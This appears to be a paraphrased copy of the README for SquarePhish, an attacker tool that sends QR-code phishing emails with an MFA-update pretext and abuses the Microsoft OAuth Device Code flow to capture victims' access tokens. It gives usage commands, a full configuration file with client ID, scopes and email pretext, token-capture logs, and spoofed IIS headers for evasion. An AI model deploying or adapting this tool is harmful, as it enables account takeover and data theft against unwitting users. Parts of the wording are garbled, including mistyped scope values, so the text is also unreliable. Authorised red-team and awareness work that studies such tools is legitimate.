SquarePhish is an advanced phishing tool. It uses a combination of the OAuth Device authentication flow with QR codes.
provides more information on OAuth Device Code flow to phishing attacks.
A SquarePhish module can be used by an attacker to send malicious QR code emails to victims. To continue to use mobile email, the default pretext is for the victim to upgrade their Microsoft MFA authentication. Microsoft Authenticator App is currently used as the client ID.
The attacker may avoid initiating the OAuth Device Code flow prematurely by sending the QR code before the attack. This only lasts for 15 minutes.
With their smartphone, the victim can scan the QR code in the email with the device. With their mobile device, the QR code will take them to an attacker-controlled server that runs the
server module at SquarePhish.
A background process triggers when the victim logs in to the SquarePhish server. This will initiate the OAuth Device Code authentication flow. The victim will then be emailed a Device Code that they will need to use on the official Microsoft Device Code website. (This will set the OAuth Device Code flow for 15 minutes).
SquarePhish will continue polling for authentication while the server is in background.
[2022-04-08 14:31:51,962] [info] [[email protected]] Polling for user authentication... [2022-04-08 14:31:57,185] [info] [[email protected]] Polling for user authentication... [2022-04-08 14:32:02,372] [info] [[email protected]] Polling for user authentication... [2022-04-08 14:32:07,516] [info] [[email protected]] Polling for user authentication... [2022-04-08 14:32:12,847] [info] [[email protected]] Polling for user authentication... [2022-04-08 14:32:17,993] [info] [[email protected]] Polling for user authentication... [2022-04-08 14:32:23,169] [info] [[email protected]] Polling for user authentication... [2022-04-08 14:32:28,492] [info] [[email protected]] Polling for user authentication...
After clicking the link in the email, the victim can visit the Microsoft Device Code authentication website via redirection from their SquarePhish URL.
After entering the Device Code, the victim will be asked for permission.
Once the victim has authenticated and consented, an authentication token will be saved locally. This token allows the attacker to access the application’s defined scope.
[2022-04-08 14:32:28,796] [info] [[email protected]] Token info saved to [email protected]
Current scope definition:
"scope”: ".default off-line_access profile openedid"
Important: Make sure to update the file with
To trigger OAuth Device Code flow, send the victim a QR code generated.
use: squish.py mail [-h][-c CONFIG][--debug] [–e EMAIL] Optional arguments: h, --help display this help message, exit -c CONFIG, squarephish config files [Default: settings.config] --debug Enable server debugging -e EMAIL,email EMAIL victim Email address for initial QR code email to HTML1
A server will point to the generated QR code and, upon request, will activate OAuth Device Code flow.
use: squish.py [-h][-c CONFIG][--debug] Optional arguments: --help display this help message, exit --c CONFIG, squarephish configuration file. [Default: settings.config] --debug server debugging
The files contain all the relevant settings that can be modified. There are several bits of information required that the user must fill out. These include SMTP_EMAIL and SMTP_PASSWORD. In-line comments have provided documentation for all configuration options in the settings file.
SQUAREPHISH_ configuration values in the EMAIL section should be identical to the ones used when SquarePhish is running.
[DEFAULT] SMTP_PORT = 465 # SMTP port, defaulted to 465 SMTP_SERVER = "smtp.gmail.com" # SMTP server, defaulted to GMail SMTP_PROTO = "ssl" # SMTP protocol: ssl, tls, None (leave empty) SMTP_EMAIL = "" # Provide authenticating email address here SMTP_PASSWORD = "" # Provide authenticating password here [EMAIL] SQUAREPHISH_SERVER = "" # Required: Provide IP address/domain name of hosted SquarePhish server SQUAREPHISH_PORT = 8443 # Hosted SquarePhish server port, defaulted to 8443 (this should match the below server value) SQUAREPHISH_ENDPOINT = "/mfa" # Hosted SquarePhish endpoint to trigger OAuth Device Code flow, defaulted to an MFA pretext (this should match the below server value) FROM_EMAIL = "[email protected]" # Default FROM address when sending an email SUBJECT = "ACTION REQUIRED: Multi-Factor Authentication (MFA) Update" # Default SUBJECT when sending an email, defauled to an MFA pretext EMAIL_TEMPLATE = "pretexts/mfa/qrcode_email.html" # Email body template for QR code email to victim [SERVER] PORT = 8443 FROM_EMAIL = "[email protected]" # Default FROM address when sending an email SUBJECT = "ACTION REQUIRED: Multi-Factor Authentication (MFA) Update" # Default SUBJECT when sending an email, defauled to an MFA pretext CLIENT_ID = "4813382a-8fa7-425e-ab75-3b753aab3abb" # Authenticating client ID, defaulted to Microsoft Authenticator App ENDPOINT = "/mfa" # Hosted endpoint to trigger OAuth Device Code flow, defaulted to an MFA pretext CERT_CRT = "" # Server SSL certificate .crt file CERT_KEY = "" # Server SSL certificate .key file EMAIL_TEMPLATE = "pretexts/mfa/devicecode_email.html" # Email body template for device code email to victim PERMISSION_SCOPE = ".default offline_access profile openid" # OAuth permission scope - https://docs.microsoft.com/en-us/azure/active-directory/develop/v2-permissions-and-consent
The folder contains the currently pre-defined pretexts.
You can create custom pretexts by using the template from the /iphone/ folder. Both the original QR code email and the follow-up device code email require an email template.
Important SquarePhish can use this information to generate emails with the right data (QR code and/or device value).
The HTML file defines several HTTP response headers. These headers can be used to replace any Flask response headers and provide a better ‘legitimate response’ from the server. You can modify, remove or add headers to improve OPSEC.
"vary": "Accept-Encoding", "server": "Microsoft-IIS/10.0", "tls_version": "tls1.3", "content-type": "text/html; charset=utf-8", "x-appversion": "1.0.8125.42964", "x-frame-options": "SAMEORIGIN", "x-ua-compatible": "IE=Edge;chrome=1", "x-xss-protection": "1; mode=block", "x-content-type-options": "nosniff", "strict-transport-security": "max-age=31536000",